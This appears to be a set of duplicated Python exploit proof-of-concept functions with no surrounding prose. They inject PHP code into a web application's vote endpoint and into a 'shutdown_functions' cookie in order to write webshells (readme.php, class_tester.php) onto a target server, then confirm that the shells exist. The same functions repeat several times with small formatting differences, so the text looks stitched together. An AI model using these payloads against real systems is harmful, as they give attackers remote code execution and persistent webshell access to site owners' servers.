def verify(cls, args):
vul_url = args['options']['target']
php = PhpVerify()
ids = cls.get_vote_links(args)
if ids:
for i in ids:
vul_path = '/index.php?m=vote&c=index&a=post&subjectid=%s&siteid=1' % str(
i)
exploit_url = vul_url + vul_path
if args['options']['verbose']:
print '[*] Request URL: ' + exploit_url
payload = {
'subjectid':
i,
'radio[]':
');fputs(fopen(base64_decode(cmVhZG1lLnBocA),w),'
'"%s");\x80' % php.get_content()
}
requests.post(exploit_url, data=payload)
v_path = '/index.php?m=vote&c=index&a=result&subjectid=%s&siteid=1' % str(
i)
requests.get(vul_url + v_path)
shell_url = vul_url + '/readme.php'
if php.check(shell_url):
args['success'] = True
args['poc_ret']['vul_url'] = args['options']['target']
return args
else:
args['success'] = False
else:
args['success'] = False
return args
def verify(cls, args):
vul_url = args['options']['target']
php = PhpVerify()
ids = cls.get_vote_links(args)
if ids:
for i in ids:
vul_path = '/index.php?m=vote&c=index&a=post&subjectid=%s&siteid=1' % str(i)
exploit_url = vul_url + vul_path
if args['options']['verbose']:
print '[*] Request URL: ' + exploit_url
payload = {
'subjectid': i,
'radio[]': ');fputs(fopen(base64_decode(cmVhZG1lLnBocA),w),'
'"%s");\x80' % php.get_content()
}
requests.post(exploit_url, data=payload)
v_path = '/index.php?m=vote&c=index&a=result&subjectid=%s&siteid=1' % str(i)
requests.get(vul_url + v_path)
shell_url = vul_url + '/readme.php'
if php.check(shell_url):
args['success'] = True
args['poc_ret']['vul_url'] = args['options']['target']
return args
else:
args['success'] = False
else:
args['success'] = False
return args
def verify(cls, args):
vul_url = args['options']['target']
shell_url = vul_url + '/inc/class_tester.php'
php = PhpVerify()
cls.cookies['shutdown_functions[0][arguments][]'] = \
cls.cookies['shutdown_functions[0][arguments][]'].format(b64encode(php.get_content()))
if args['options']['verbose']:
print '[*] Request URL: ' + vul_url
print '[*] Payload Content: ' + cls.cookies['shutdown_functions[0][arguments][]']
requests.get(vul_url, cookies=cls.cookies)
if php.check(shell_url):
args['success'] = True
args['poc_ret']['vul_url'] = vul_url
return args
def verify(cls, args):
vul_url = args['options']['target']
shell_url = vul_url + '/inc/class_tester.php'
php = PhpVerify()
cls.cookies['shutdown_functions[0][arguments][]'] = \
cls.cookies['shutdown_functions[0][arguments][]'].format(b64encode(php.get_content()))
if args['options']['verbose']:
print '[*] Request URL: ' + vul_url
print '[*] Payload Content: ' + cls.cookies['shutdown_functions[0][arguments][]']
requests.get(vul_url, cookies=cls.cookies)
if php.check(shell_url):
args['success'] = True
args['poc_ret']['vul_url'] = vul_url
return args
else:
args['success'] = False
return args
def verify(cls, args):
vul_url = args["options"]["target"]
php = PhpVerify()
ids = cls.get_vote_links(args)
if ids:
for i in ids:
vul_path = "/index.php?m=vote&c=index&a=post&subjectid=%s&siteid=1" % str(i)
exploit_url = vul_url + vul_path
if args["options"]["verbose"]:
print "[*] Request URL: " + exploit_url
payload = {
"subjectid": i,
"radio[]": ");fputs(fopen(base64_decode(cmVhZG1lLnBocA),w)," '"%s");\x80' % php.get_content(),
}
requests.post(exploit_url, data=payload)
v_path = "/index.php?m=vote&c=index&a=result&subjectid=%s&siteid=1" % str(i)
requests.get(vul_url + v_path)
shell_url = vul_url + "/readme.php"
if php.check(shell_url):
args["success"] = True
args["poc_ret"]["vul_url"] = args["options"]["target"]
return args
else:
args["success"] = False
else:
args["success"] = False
return args
